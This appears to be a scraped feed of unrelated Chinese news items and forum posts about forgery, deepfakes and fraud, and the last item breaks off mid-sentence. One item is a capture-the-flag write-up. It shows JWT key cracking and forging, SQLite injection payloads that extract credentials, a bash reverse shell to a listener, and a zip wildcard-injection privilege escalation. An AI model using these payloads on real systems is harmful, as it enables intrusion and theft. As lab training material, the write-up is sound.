IT之家 6 月 6 日消息,据公安部网安局公众号,2026 年高考进入倒计时,公安网安部门紧盯仿冒官方网站、虚假查分链接、涉考引流诈骗等突出风险,护航高考安全平稳进行。 近日,广东公安网安部门工作发现,网上有多条涉 仿冒教育考试类官网“假查分、伪造成绩” 帖文,引发网民关注和讨论。 经查,违法行为人罗某于 2026 年 1 月开始,仿照“中国教育考试网”等教育考试相关官方站点, 搭建虚假教育考试网站 ,并通过社交平台进行非法引流,以 提供“定制版成绩查询页面”“定制版成绩查询截图”等虚假成绩 为名,收取费用、非法牟利,其行为严重扰乱招生考试秩序。 目前,属地公安机关已对罗某依法采取刑事强制措施, 相关虚假网站、引流账号均被关停清理 。 IT之家获悉,涉仿冒教育考试网站类违法行为通常具有“三步走”特征。 克隆官网,伪造“官方背书”。行为人搭建界面与官方高度相似的虚假网站,并设置“高考相关入口链接”作为“信任背书”, 诱导网民误以为其为官方子站 ,以此骗取考生和家长的信任,降低其防备心。 精准围猎,瞄准“逃避型”心理。通过社交平台将流量导入假网站,专门瞄准 考试失利、压力过大、害怕家人失望 的考生及家长。利用当事人“不想面对现实、急需一个交代”的脆弱心理,将虚假网站包装成可以“解决麻烦”的灰色渠道。 贩卖假象,收割“遮羞费”。以提供“定制成绩页面”“生成逼真截图”为由收取费用。实质上,这些所谓的“成绩”并未录入任何官方系统,仅仅是用 Photoshop 或前端代码 生成的视觉骗局。此举不仅骗取钱财,更是严重诱导考生使用虚假成绩欺骗家人,干扰志愿填报或复读等决策。 网警提醒:网络不是法外之地,仿冒教育考试类官网,利用信息网络生成虚假考试成绩牟利,涉嫌非法利用信息网络罪,将依法受到严厉打击。 广大考生和家长查询成绩、确认录取进度,务必认准官方渠道,切勿点击不明链接 。
19.9元“MIMI”发卡附赠字母“UU”,粘贴“变身”三千多元的高仿“MIUMIU”大牌配饰。最近,这段短视频在平台热传,该仿冒产品的热销,也撕开奢侈品高仿泛滥的隐秘面纱。 “6•18”前夕,“马上测”工作室开箱淘宝、抖音、微店、拼多多等平台的多款仿冒大牌商品,实测灰色产业链多种套路。我们发现,在上述多个平台,检索过一次假货相关关键词后,平台便会不停推流类似高仿产品;有时检索正品,首先跳出来的也是假货。 另一方面,商家钻漏洞,靠着“同款”“小众平替”“混背”等擦边标题、暗藏大牌logo的实拍图精准薅流量,造假套路也花样翻新,除了伪造专柜购物小票、自制虚假防伪芯片外,还有商家售卖与大牌logo不同的高仿产品并附赠DIY改标教程,层层伪装。 知识产权律师提醒,商家花式伪装兜售高仿产品,攀附名牌商誉已构成商标侵权与不正当竞争,涉案金额达标或将触犯刑责;平台放任假货借算法肆意导流,疏于风控拦截,依法要连带担责。 部分高仿包配有防伪卡,还有的则通过指导消费自己DIY,让包包变身“高仿”大牌。 平台算法推流混杂假货?商家标签也在玩擦边套路 “马上测”工作室分别在淘宝、抖音、微店、拼多多购买了“高仿”大牌的包包、鞋子、围巾、项链和帽子等产品,从下单到开箱,实测其中套路。 我们发现,在淘宝平台中,一款售价239元的香奈儿仿款钱包极具代表性。该商品推荐标签刻意规避品牌名称,仅标注“小香款”,但商品主页配图使用香奈儿高仿包原图,仅对双C标志做轻微打码处理,消费者依旧能清晰识别仿制品牌。记者开箱实测发现,这款钱包包装简陋、内里做工粗糙,属于典型的“一眼假”产品。 抖音平台多款奢侈品仿品同样采用标签擦边的售卖方式。一款售价65元的撞色鸭舌帽,商品标签标注为“miu家同款撞色鸭舌帽”,未直接标注大牌名称,但产品本体印有清晰的“MIUMIU”logo,仅内侧标签标注其他工作室名称,混淆消费者判断。 另有一款售价128元的项链,平台标签仅标注“铜合金项链,单花红色四叶草项链”,无任何品牌字样,实则仿制梵克雅宝经典款式。产品开箱配有完整礼袋、包装盒和配套卡片,卡片还宣传商家售卖各大奢侈品大牌的“顶级”版本手表、首饰、眼镜、手镯,但项链本身质感粗糙,与正品差距明显。 微店平台的售假套路如出一辙。一款售价188元的假冒Gucci运动鞋,商品主页直接堆砌“古奇脏脏鞋 Gucci/古驰小脏鞋古奇 Screener系列脏脏鞋g家小脏鞋情侣鞋”等相关字样,直白绑定大牌IP。 另有一款香奈儿仿品围巾,商品标签仅平淡标注“双面羊毛菱格围脖围巾 黑色/藏青色/黑杏色/灰色”,无任何品牌信息,但主页展示图片直接使用带有香奈儿标识的仿品图。 记者在检索上述“高仿”大牌时发现,在上述多个平台,有时检索正品,首先跳出来的也是假货;检索过一次假货相关关键词后,平台便会不停推流类似高仿产品;也有平台放任假货借算法导流。 到手后发现,不少仿品包装齐全,甚至配有购物小票。 高仿套路层层翻新,多重伪装极具迷惑性 除了标签擦边引流,各大平台售假商家打造出全套伪装、DIY改标、虚假溯源等多种新型造假套路,高仿产品仿真度不断提升,极具迷惑性。 例如,在拆箱实测中我们发现,微店所购的188元的假冒Gucci脏脏鞋,造假伪装细节完备,产品到货后配有完整包装袋、服务卡和产品标签,扫码可跳转至Gucci官方网站。不过,鞋子外包装盒颜色与正品存在明显差异,且伴有浓重异味。商家直言,该产品为高版本一比一专柜复刻,销量稳定、客源众多。 微店仿制的香奈儿围巾更是“精细”,复刻了正品全套配套物料,盒子、吊牌、消费小票一应俱全。附带的购物小票信息详尽,标注售价3680港币,虚构购买门店为香港尖沙咀弥敦道商圈的义安城,还填写了导购姓名、信用卡卡号末四位等细节。 我们实测发现,这款围巾的质感、图案高度还原正品,若非专业鉴别,普通消费者难以分辨。经记者核查验证,义安城实际位于新加坡,并非小票标注的香港地区,属于完全伪造的购物信息。 DIY手动改标则是另一种隐蔽的售假套路。和“MIMI”发卡附赠字母“UU”变成“MIUMIU”类似,我们在抖音平台购买了一款标注为“中古款迷你CF斜挎小包”的产品,商家主页主图隐藏香奈儿标志,仅在评论区有用户晒出带香奈儿标识的包包。 记者购买开箱后发现,产品原配锁扣为两个相互嵌套的“O”型造型,无任何大牌标识,但内包装附带专属DIY教程卡片。 记者向客服咨询后,对方发送详细的DIY改造视频和文字教程,指导消费者“扣出”“双C”标志。记者按照教程实操验证,仅需轻微用力即可拆解双“O”边缘,轻松将原配锁扣改造为仿香奈儿的“双C”标志。 拼多多平台则出现了虚假芯片溯源的高仿包包。记者实测购买一款仿LV包包,产品包装齐全、做工逼真,整体仿真度极高。商家宣称该包自带专属防伪芯片,支持手机感应溯源。实测中,将手机贴近包包底部,确实可以成功弹出溯源页面及详细溯源信息。但记者进一步核查发现,该溯源网址并未在工信部备案。 实测多个电商平台发现,检索真货大牌时出现假货;检索一次假货后平台连续推流。商家通过“混背“”复刻”“1:1"等标签引流。 专家:商家售卖高仿和“擦边”属违法,平台也应承担连带责任 针对前述情况,华东政法大学知识产权法律与政策研究院杨勇研究员认为,商家通过“小香款”“同款”等擦边标签、隐晦文案规避平台审核,搭配高仿主图售卖大牌仿品,或者不直接标注品牌全称,但利用文字擦边、图文割裂方式刻意误导消费者的行为,属于虚假宣传,构成商标侵权和不正当竞争;另一方面,商家实施商标侵权和不正当竞争行为,需要承当相应的民事、行政乃至刑事责任:最后,商家售卖大牌仿品,情节达到法定标准,则会触犯刑法,需要承担相应的刑事责任。 商家售卖无大牌标识的基础款产品,配套教程引导消费者手动DIY改装、变造logo变身大牌高仿品,是否属于侵权行为? 杨勇称,这仍然属于商标侵权和不正当竞争。据《商标法》第四十八条规定,商标的使用并不局限于商品本身或某一特定环节,而是要从商业活动的整体过程分析。 “商家无论是直接贴牌销售还是销售后帮助贴牌,本质上都是在商业活动中使用了商标,其帮助贴牌行为完成后才是销售行为的终结。”杨勇提到,因此,商家售后贴牌的行为属于《商标法》意义上的商标使用,构成商标侵权。《商标法》第五十七条规定,故意为侵犯他人商标专用权行为提供便利条件,帮助他人实施侵犯商标专用权行为的,构成商标侵权。商家售后贴牌,本质上是商家为消费者提供便利条件后,借助消费者的行为完成了商标侵权。根据前述《反不正当竞争法》第二的相关规定,商家售后贴牌的行为攀附商业信誉,同时构成不正当竞争。 关于商家通过虚假备案溯源网址、伪造专柜小票、虚构门店信息等方式营造正品假象的行为,除构成商标侵权和不正当竞争行为外,还有可能涉及多种刑事责任:若商家涉案销售金额、违法获利达到法定标准,则可能构成假冒注册商标罪或销售假冒注册商标的商品罪;若商家伪造的是发票而非仅是小票,可能构成非法制造、出售非法制造的发票罪;若商家伪造专柜小票、溯源凭证的同时也伪造了公司、企业印章罪,则可能构成伪造公司、企业、事业单位、人民团体印章罪;商家伪造仿官方溯源网站、仿备案资质的行为,情节严重的,还可能构成非法利用信息网络罪。 杨勇提到,普通消费者如买到此类假货,可以依据《消费者权益保护法》第五十五条的规定:“经营者提供商品或者服务有欺诈行为的,应当按照消费者的要求增加赔偿其受到的损失,增加赔偿的金额为消费者购买商品的价款或者接受服务的费用的三倍;增加赔偿的金额不足五百元的,为五百元”,向商家主张退一赔三。而如果各大电商平台未尽到审核拦截义务,应依法与该销售者或者服务者承担连带责任。 查看评论
法庭文件显示,马斯克旗下人工智能公司xAI已向法院提交申请,要求四名原告在一项涉及Grok深度伪造色情图像的拟议集体诉讼中,以真实姓名提起诉讼。原告方面认为,公开他们的身份可能会加剧骚扰风险,并加重宣誓陈述中所述的个人后果。 法庭文件显示,原告目前登记为南卡罗来纳州 Doe、南卡罗来纳州 Roe、新泽西州 Doe 和俄亥俄州 Doe,这些原告会向 xAI披露自身真实身份,但在公开案件卷宗中继续使用上述化名。 xAI的律师辩称,民事诉讼通常要求明确列明被告,且公众有理由了解是谁在对公司提起诉讼。他们还指出,原告并未证明存在具体威胁进一步损害的情况,并提到法院正在对争议图像进行封存处理。 xAI的代理律师在5月15日提交的法律文书中写道:“抛开深度伪造图片本身不谈(该图片将继续封存不予公开),在不披露原图的前提下,仅对外说明有人制作了针对南卡罗来纳州匿名原告的深度伪造图像,这件事本身并不会带来名誉污损。因此,本案并不涉及法律上历来认定、需要采用化名应诉的重大隐私权益。” 原告方提交了书面宣誓证词,详述自身遭受的精神损害,并表示倘若被迫使用真实姓名参与诉讼,或将撤诉。相关卷宗同时载明,涉案争议图片并未附入公开庭审文件。 一名原告表示,一张被指操纵的图片将他“裸露成暴露的比基尼”,并以“我绝不会公开分享的方式”展示了他的身体。该声明还补充道:“当我想到那个请Grok制作深度伪造视频的人对这张照片做了什么时,我感到极度恶心。” 另一位原告,身份为新泽西州 Doe,表示他曾在自己的 X 账户上发布了一张自己的照片。后来他注意到 Grok 在该网站上制作了他人的人脸深度伪造图像,并要求“Grok 不得在未经我同意的情况下生成我的图像”。他随后发现两张所谓的深度伪造照片“实质上具有色情性质”,并写道:“这一请求让我的账号引起了网络喷子的注意,他们利用 Grok 对我进行骚扰和造成困扰。” 在一份回应文件中,原告律师敦促法院维持化名,并指责xAI利用此事向原告施压,试图迫使他们放弃诉讼。 诉状中指出:“在脱去原告的衣物后,xAI现在试图剥夺原告的化名,明显意图通过叠加他们希望消除的相同损害,恐吓原告放弃诉讼。” 查看评论
IT之家 6 月 4 日消息,据路透社报道,英国议员杰丝 · 阿萨托正起诉埃隆 · 马斯克旗下的 xAI 公司,她在周三发布声明称,Grok AI 平台被用于制作她的色情伪造图像。 Grok 依托马斯克旗下社交平台 X 对外提供服务。今年早些时候,该工具因被滥用、未经当事人许可生成色情伪造图像引发强烈抗议,目前已有多个国家的监管机构针对这款产品展开调查。 身为英国首相基尔 · 斯塔默所属工党议员的阿萨托在声明中表示:“Grok 生成的深度伪造色情内容侵害了数千名妇女与未成年人的权益。该功能的出现绝非偶然失误,也不是用户误用所致,而是产品研发方刻意的设计选择。我提起本次诉讼,就是要追究相关设计决策的法律责任。” IT之家注意到,今年 1 月中旬,xAI 曾表态,已对 Grok 的图片编辑功能作出限制,在相关行为属于违法的司法辖区内,禁止用户生成身着暴露服饰的人物图像。 路透社 2 月上旬核查发现,即便新规落地,只要用户输入相关指令,即便明确标注图像当事人并未授权,Grok 依旧能够生成涉黄伪造人像。 xAI 隶属于马斯克的 SpaceX,后者计划于本月晚些时候推进上市,有望创下全球史上规模最大的首次公开募股纪录。 阿萨托办公室发布的资料显示,她在 1 月公开抨击 Grok 之后,就有网友制作并散播她身穿比基尼的伪造图片,还炮制出一段视频,内容为她被氯仿迷晕、即将遭受性侵的虚构画面。 今年 3 月,美国巴尔的摩市也对 xAI 提起诉讼,主张 Grok 可生成色情伪造图像的特性违反了当地消费者保护相关法规。 代理律所 AWO 透露,阿萨托已向英国高等法院递交诉状,指控对方违反数据保护法规、不当滥用个人隐私信息。她提出多项维权诉求,包括索要赔偿金、要求对方正式承认相关行为违法,同时申请法院下达禁令,勒令 xAI 终止一切相关不法行为。 AWO 律所法务主管拉维 · 奈克表示:“本案是首批针对人工智能产品设计追责的诉讼之一,我们希望借此明确:人工智能研发企业不能把安全保障当作事后补救的备选事项。”
靶机来自 MazeSec(迷踪安全): MazeSec | About 靶机名:Watcher 作者 :Yolo 也是很久没有打了,前面的都是打完很久才来复盘。这次来个新鲜的,刚出来,今天刚打完的靶机。 关于靶机配置之前讲过了,这里就不多说了。 最近换成用wsl的kali了,只能是nat网络,所以靶机都用的Host-only,所以都是走的 192.168.56.0/24这个网段 该网段windows侧的ip为 192.168.56.1 。这样会导致我的kali能访问到靶机,但是靶机访问不到kali。 这里就相当于windows和靶机都是一个”公网ip“,kali是windows的nat后面的”私网ip“ 我换wsl主要是不想每次去多开一台虚拟机,还有vmware那个桥接网络不知道为什么ip老是变甚至有时候ipv4都没有,还要我手动续租什么的。但是这也有个问题就是反弹shell就做不了,我的做法是windows上装一个nc监听来平替。 话不多说,直接开打。 信息收集 靶机ip: 192.168.56.106 端口扫描 ┌──(kali㉿JYlover)-[~/tmp] └─$ nmap -p- 192.168.56.106 开放22、5000端口。 只有一个5000端口有价值,但是我们又不知道 upnp 是啥,我尝试去浏览器访问一下。 是一个web页面,那么入口点肯定就是web了,那我们就开始web渗透 web渗透 看到登录框先是尝试了一下sql注入等。但是都没什么用,这里不知道怎么办的话可以先扫一下目录,这也是一般web渗透的流程。 就只有一个登录一个注册。 那我们直接注册一个账号好了。 进来后我们尝试访问系统管理页面,但是发现说我们权限不足,权限是 normal 这里的权限认证大概率就是jwt了,但是我们还是尝试抓个包看看 果然就是jwt。我们去爆破一下密钥。 python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imp5bGkiLCJsZXZlbCI6Im5vcm1hbCIsImlhdCI6MTc4MDM4NDE4MywiZXhwIjoxNzgwMzg3NzgzfQ.vjfC3JLnFq0q4BoVYbpe3QQQFyFytl751JD5hTiwDDU -C -d jwtkey.txt 成功拿到jwt密钥: maze 尝试伪造。 python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imp5bGkiLCJsZXZlbCI6Im5vcm1hbCIsImlhdCI6MTc4MDM4NDE4MywiZXhwIjoxNzgwMzg3NzgzfQ.vjfC3JLnFq0q4BoVYbpe3QQQFyFytl751JD5hTiwDDU -I -pc level -pv admin -S hs256 -p "maze" 拿到密钥: [+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imp5bGkiLCJsZXZlbCI6ImFkbWluIiwiaWF0IjoxNzgwMzg0MTgzLCJleHAiOjE3ODAzODc3ODN9.EP8qh3LLC4wozyqw3n-yFHuyfZi5uIoPvD8f34972XM 也可以直接去jwt官网用密钥修改。 然后直接去浏览器的 开发者工具–>应用–>cookie中替换新的jwt即可: 然后就可以正常进入系统管理页面了。 然后是改系统设置的地方,这里抓个包。 我们在value这里试试也没有sql注入。 造成sql语法报错,存在sql注入,而且这里大概率是update语句,那union注入就行不通了。但是因为这里会把更新成功的value给回显出来,所以我们尝试子查询。 这里是报没有 database() 函数,那说明我们的sql语句是没问题的,只是函数错了,那这是个好事啊。说明只是这不是mysql数据库,查询是对的,我们换sqlite的函数试试。 果然是sqlite。那后面就是直接sql注入了,不过多讲解。 最终payload: {"key":"theme","value":"light',value = (select group_concat(tbl_name) from sqlite_master )--+"} # "current_value": "users,users,sqlite_sequence,settings,settings,secret" {"key":"theme","value":"light',value = (select group_concat(sql) from sqlite_master where tbl_name = 'secret' )--+"} # "current_value": "CREATE TABLE secret (id INTEGER PRIMARY KEY AUTOINCREMENT,secret TEXT NOT NULL )" {"key":"theme","value":"light',value = (select group_concat(secret) from secret )--+"} # "current_value": "watcher:mazesec123q1231w!@#!@@#$" 获得登录凭证: watcher:mazesec123q1231w!@#!@@#$ 然后就可以直接ssh登录了。 flag{user-c3949567202847f1ad8664095f0a94e4} 权限提升 我们先老规矩传 pspy64 上去看看: 注意到这里两行: 2026/06/02 08:15:50 CMD: UID=0 PID=408 | /bin/bash /opt/autoarchive/sync.sh 2026/06/02 08:15:50 CMD: UID=0 PID=407 | inotifywait -m -e create /home/watcher/uploads 以root身份执行的一个一个脚本 /opt/autoarchive/sync.sh 可能是脚本中执行的命令 :inotifywait是监控文件系统的工具 $ inotifywait -m -e create /home/watcher/uploads # -m参数:持续监控模式。 # -e参数:指定事件类型 ,这里指定creat事件 实时监控 /home/watcher/uploads 目录,当有新文件或子目录创建时,立即输出事件信息。 说明如果uploads文件夹发生变化会触发一些东西。那这个uploads文件夹我们去看看。 随便在目录下创建一点东西。 创建的瞬间就自动执行了脚本 /opt/autoarchive/archive-helper ,肯定是想去看看这个脚本是做什么的,但是这个目录我们没有权限 watcher@Watcher:/opt$ ls -al total 16 drwxr-xr-x 4 root root 4096 May 22 12:16 . drwxr-xr-x 18 root root 4096 May 16 05:19 .. drwx------ 2 root root 4096 May 22 12:29 autoarchive drwxr-xr-x 5 www-data www-data 4096 May 22 11:55 watcher 这里我们虽然不知道这个脚本是做什么的,但是静下来想一下: 一个脚本,参数是我们刚刚创建的文件。那么就很有可能是监控并把产生的文件给打包到哪里去吧。但是想不到打包这个操作也没事(而且zip,gzip,这么多打包命令也不知道是哪个) 此时我们可以打开pspy的文件系统监控功能。 watcher@Watcher:~$ ./pspy64 -fp # pspy默认是监控进程,但是有了-f参数就是文件系统,-p参数是进程,所以我们同时监控两个 很明显抓到了调用了zip命令。 这里是有几率抓到一条zip命令的进程的,只是我们的文件太小了,zip压缩太快了,而pspy的原理其实是通过查看/proc目录实现监控的,所以太快的话就可能抓不到。 这里抓到这个包是要有点运气的,比较稳的方法是压缩一个超大文件,这里我就没有去演示了。 还有一点是实验可以发现,这个脚本应该就只是检测txt文件,如果是其他文件的话不会触发压缩。 既然是zip命令的话我们就很明显了,应该是使用zip打包时使用了通配符打包所有文件。 那这样就存在一个通配符参数注入的问题。 我们查一下 GTFObins 是可以做到命令执行和文件读取的,我们可以利用文件名做参数注入: 先准备一个反弹shell的脚本 watcher@Watcher:~/uploads$ cat shell.txt #!/bin/bash bash -i >& /dev/tcp/192.168.56.1/9999 0>&1 给脚本添加可执行权限,并创建参数注入文件 watcher@Watcher:~/uploads$ chmod +x shell.txt watcher@Watcher:~/uploads$ >'-T -TT shell.txt' 然后nc监听等待回弹shell就好了(我这里又创建一个1.txt是为了触发脚本) 关于zip提权 这里稍微了解一下zip的这个参数问题。 zip存在两个参数: -T :测试zip文件完整性, -T 会调用 unzip -tqq 来测试 -TT :用你指定的命令来测试,如: -TT cmd :使用 cmd 作为解压测试的命令。zip 会创建一个临时文件,执行 cmd tmpfile.zip ,如果命令返回 0 则认为测试通过。 注意 :这里的 cmd 是一个外部可执行程序,也就是说它可以是一个命令,也可以是一个shell脚本。 所以这里就会执行这个命令 回到我们构造的payload: 我创建了一个文件: watcher@Watcher:~/uploads$ >'-T -TT shell.txt' 此时文件夹存在文件 -T -TT shell.txt 和文件 shell.txt 其中shell.txt是反弹shell脚本。 此时后台root可能执行了: zip shell.txt -T -TT shell.txt 后面这个文件就被当作参数执行了。 其他做法 这里分享一些其他解法。来自其他群友的wp sleep替换 解法来自——Aristore 附上群友wp截图: 说实话这里的sleep命令的发现,我还没有复刻,不管是pspy还是上面的命令都没有抓到。 但是这个方法是稳定可行的。 原因是他这里看了 /proc/$NEW_PID/cmdline ,这个文件里是进程的启动命令。 所以启动命令是 sleep 3 ,这里使用的相对路径,我们可以直接看一下脚本源码: root@Watcher:/home/watcher/uploads# cat /opt/autoarchive/sync.sh cat /opt/autoarchive/sync.sh #!/bin/bash WATCH_DIR="/home/watcher/uploads" HELPER_PATH="${AUTOARCHIVE_HELPER:-/usr/local/bin/archive-helper}" mkdir -p /root/backups inotifywait -m -e create "$WATCH_DIR" | while read -r path action file do case "$file" in *.txt) sleep 3 cd "$WATCH_DIR" || exit 1 export PATH="$WATCH_DIR:$PATH" # Archive all .txt files after each new .txt file event. "$HELPER_PATH" *.txt >> /var/log/autosync.log 2>&1 ;; esac done 其实这个方法之所以能成功是很多巧合的,所以也只能算是学习一种思路吧。 这里看一下出题人说的: 是为了预期解能成功所以添加了PATH变量,再加上sleep没有使用绝对路径(一般都不会用绝对路径吧),所以导致执行sleep时会默认去uploads目录下找,此时我们在uploads下创建sleep文件才能被执行。算是一种非预期解吧。 CVE-2026-43494-PinThef 解法来自——BR 该内核漏洞也可直接提权,这里这个CVE我还没有太了解过,就没有复现了,后续可能找时间了解。大家可自行复现。 这里附上群友的wp截图: 知识点总结 通过这次靶机可以了解到以下知识点,大家打完后可以复习一下: jwt 的密钥爆破及payload伪造 sqlite注入(UPDATE的注入使用子查询,而不是union等) zip命令的通配符参数注入( -T -TT shell.txt ) sleep命令替换(非预期,可学习思路) 1 个帖子 - 1 位参与者 阅读完整话题
IT之家 6 月 2 日消息,据央视新闻 2 日(今天)报道,上海警方破获一起伪造证照、开设“幽灵外卖”店铺的案件。 一家总部位于上海的某餐饮管理公司主营牛排、凉菜等熟食类产品,并以品牌加盟、食材供货的名义,招揽有意经销他们产品的外卖商户。然而,一些想要加盟的店铺 并没有正规的资质 ,据此,该公司声称 “可帮忙代办全套证照”,并代办入驻外卖平台 。然而,所谓“代办”其实就是 伪造证件 进行办理。 在这家公司的操作下,没有任何资质的无证小作坊,就能摇身一变,成为外卖平台上的合规餐饮门店。警方调查发现,有的线上早餐店套用了 线下早已关门歇业的早餐店地址 。 上海市公安局宝山分局经侦支队副支队长季敏表示:“我们认为它是幽灵外卖的一种,有些店铺一店多开以后,可能它是某某麻辣烫,实际上它还可以出汉堡或别的餐饮,在实际的马路上是看不到这家某某汉堡店的,他们会跟骑手说你接到这个单以后就到麻辣烫店,我会把汉堡从里面拿出来,那么对汉堡店来说,其实就是间幽灵餐饮。” 经查,与涉案公司关联的外卖店铺遍布全国,数量高达 200 余家,目前已查实 33 家门店的证照涉嫌伪造 。该公司负责人何某、李某等 7 名涉案人员及上游制作假证的犯罪嫌疑人顾某、罗某被抓获。9 人因 涉嫌伪造国家机关证件罪 ,被采取刑事强制措施,案件正在进一步侦办中。 据IT之家此前报道,今年 5 月,上海推出了全国首个网络餐饮电子证照核验应用,构筑 从商户申请到平台亮证的“申请-比对-授权-亮证”全套数字化管理闭环 ,旨在对“幽灵外卖”实现源头治理。 相关阅读: 《 整治“幽灵外卖”,上海推出全国首个网络餐饮电子证照核验应用 》
在AI辅助论文撰写时,想让AI完全不伪造文献到目前为止还是很难。 那么各位佬们是否有什么更好的工作流来缓解这种情况呢? 在写完之后,想要针对bib文件进行溯源检查,有什么高效的方法吗? 先让AI自查,再人工检查一遍? AI查有什么好用的skill或者工作流吗? 人工查的话有什么比较好的工具吗? 如果有相关经验的佬,希望不吝赐教! 先行感谢 ~~ 18 个帖子 - 13 位参与者 阅读完整话题
使用哈基米网页版搜索文献感觉很好用,很少遇到参考文献是假的,所以我在claude code中做了一个哈基米的子代理方便搜索文献,几个月下来感觉体验不错。今天用着用着发现几篇论文内容感觉不对劲,网页版再试试搜索,真不对劲了,链接都是假的,不知佬友们有么有相同的情况 2 个帖子 - 2 位参与者 阅读完整话题
IT之家 5 月 26 日消息,直播电商与短视频带货已成为推动消费增长的重要渠道,但与此同时,虚假宣传、夸大功效、伪造专家形象等乱象仍时有发生。央视新闻今日曝光了最新的互联网广告乱象。 例如,在某短视频平台,有带货主播为吸引宝妈及敏感肌人群,极力推荐该产品的安全性,声称其达到“医用级”,不含添加剂、防腐剂和荧光剂。 在“医用级”卖点的助推下,该链接一经弹出便被大量下单,累计销量达 2 万单。然而,该产品实际为普通洗脸巾,并未达到宣称的标准,且医疗器械广告须经审查后方可发布,当事人因未经审查擅自发布医疗器械广告,违反了《中华人民共和国广告法》第四十六条的相关规定。 类似的违规宣传不止于此。在上述直播间销售一款益生菌固体饮料时,主播声称其对幽门螺杆菌、胃炎、胃溃疡具有治疗作用。 但央视记者调查发现,该产品为固体饮料,无保健食品所特有的“蓝帽子”标识,既非保健食品也非药品。山东省市场监管部门经查认定该行为属于违规宣传,依法对当事人处以 10.5 万元的罚款。 随着人工智能技术的迅速发展,短视频带货中利用 AI 仿冒名人进行虚假宣传的现象亦屡见不鲜。广东省市场监管部门不久前查处了一起典型案例:视频中,一位专家正侃侃而谈推销一款压片糖果,但经核查,视频中的画面与声音均由 AI 技术合成伪造,并非专家本人出镜,涉案企业也未获得授权。 监管部门认定该广告内容已构成虚假广告,对此进行了立案处罚。另据佛山市市场监督管理局公布的案例,佛山市新娱科技有限公司利用 AI 技术合成著名“三农”问题专家温铁军的肖像、声音及视频片段,制作了时长 65 秒的商品推销视频,误导消费者认为该商品由温铁军背书,构成虚假广告,已被依法查处。 针对互联网广告领域存在的种种问题,监管部门已从制度层面展开系统性治理。IT之家注意到,市场监管总局近期印发《关于深化互联网广告生态治理工作的通知》与《互联网广告市场秩序整治重点任务》,决定开展为期半年的互联网广告市场秩序整治行动。 这是监管部门首次提出“互联网广告生态治理”概念,旨在健全监管制度体系、压实平台主体责任,并明确将集中整治直播电商中的违法广告以及 AI 生成式广告作为重点任务。 在此框架下,监管部门要求严厉打击利用 AI 技术冒充专家、明星、名医等形象制作虚假广告的行为,并确保人工智能生成广告可识别、必须标识。 与此同时,针对短视频领域存在的内容来源不明、真实性与信息混淆等突出问题,中央网信办已全面部署推进规范短视频内容标注工作,要求网站平台必须为用户提供包括“含有虚构演绎内容”“含有 AI 生成内容”“含有营销信息”“内容为转载”“内容为个人观点”和“无需标注”在内的六类“必选标签”,并将内容标注设为短视频发布的必经环节。 市场监管总局广告监管司相关负责人表示,下一步将持续压实互联网平台、广告设计制作单位以及市场调研服务机构的责任,督促各方主动摒弃容易误导消费者的呈现方式,进一步提升广告信息的透明度与合规性。
财联社5月22日电,香港证监会今天发出通函,列明在开立帐户及维持客户关系时应实施的监控措施。该通函是在证监会对12家证券经纪行的开户作业手法进行检视后发出的。 有关检视识别出多项重大缺失,包括开户文件的尽职审查不足,在开户过程中接受可疑或伪造文件,及在管理与海外中介人的跨境代理关系方面的弱点 。证监会对客户帐户有可能遭不当使用来进行可疑或不法交易,及因而加剧的洗钱及恐怖分子资金筹集风险,深表关注。 证监会要求所有持牌法团在切实可行的情况下尽快进行内部核查,以侦测是否有任何可疑或伪造文件曾被接受用来开立帐户。 香港证监会中介机构部执行董事叶志衡博士表示:“持牌法团在拓展其业务时,不应以牺牲“认识你的客户”标准为代价。证监会对在开户过程中的严重监控失误及使用伪造文件的情况采取零容忍态度,并将对相关持牌法团及其高级管理层采取坚决的监管及执法行动,以维持市场的廉洁稳健及公平的竞争环境。” cls.cn 香港证监会:增强措施以应对伪造文件及洗钱风险并提高开户标准 香港证监会:增强措施以应对伪造文件及洗钱风险并提高开户标准 转自encmasuta 1 个帖子 - 1 位参与者 阅读完整话题
金十数据5月22日讯,香港证监会今天发出通函,列明在开立帐户及维持客户关系时应实施的监控措施。该通函是在证监会对12家证券经纪行的开户作业手法进行检视后发出的。有关检视识别出多项重大缺失,包括开户文件的尽职审查不足,在开户过程中接受可疑或伪造文件,及在管理与海外中介人的跨境代理关系方面的弱点。证监会对客户帐户有可能遭不当使用来进行可疑或不法交易,及因而加剧的洗钱及恐怖分子资金筹集风险,深表关注。证监会要求所有持牌法团在切实可行的情况下尽快进行内部核查,以侦测是否有任何可疑或伪造文件曾被接受用来开立帐户。证监会亦列出持牌法团在为内地投资者开立和管理有关帐户方面的额外措施。这些额外措施包括关闭以可疑或伪造文件开立的投资帐户,关闭零结余不动投资帐户,以及在开立新的投资帐户时,须取得投资者书面声明,并要求在结算及资金提存时只可透过以客户本身的名义在合资格银行持有的银行帐户进行。(金十数据APP) 3 个帖子 - 3 位参与者 阅读完整话题
美国一项针对性影像深度伪造和其他非自愿私密影像的新法律——“下架法”(Take It Down Act)于 2026 年 5 月 19 日正式全面生效,要求互联网平台在接到通知后 48 小时内删除相关内容,否则将面临高额罚款。 该法去年由总统唐纳德·特朗普签署,立即将传播真实或 AI 生成的非自愿私密影像定为联邦犯罪,但真正引发争议的是其“通知—下架”条款,被批评为既可能难以真正帮到受害者,又可能为政府审查提供工具。 美国联邦贸易委员会(FTC)已向十多家大型科技公司发函,包括亚马逊、Alphabet、苹果、Meta、微软、TikTok、Snap 等,提醒它们需要提供便捷的申诉入口,并在 48 小时内删除被投诉内容及所有“已知的相同拷贝”,否则每一项违规都可能被处以超过 5.3 万美元的民事罚金。 多家平台公开表示支持该法案,并强调自身已有自动检测与举报机制,其中部分公司还强调与反儿童性剥削机构以及现有“撤除私密影像”项目的合作。 然而,长期从事图像性暴力议题研究的专家、权益团体及数字权利组织对该法案持强烈保留态度。 一些学者指出,特朗普曾在国情咨文中公开表示要“为自己用”这部法律,这被解读为最高权力层将其视作打击政治敌人的潜在工具,而非以受害者为中心的制度安排。 反性影像暴力倡议者玛丽·安妮·弗兰克斯等人担心,该法可能对与政府立场不一致的平台(例如维基百科)造成更大压力,同时对“友好平台”网开一面,从而扭曲执法。 数字权益组织如电子前哨基金会(EFF)、卡托研究所及 Public Knowledge 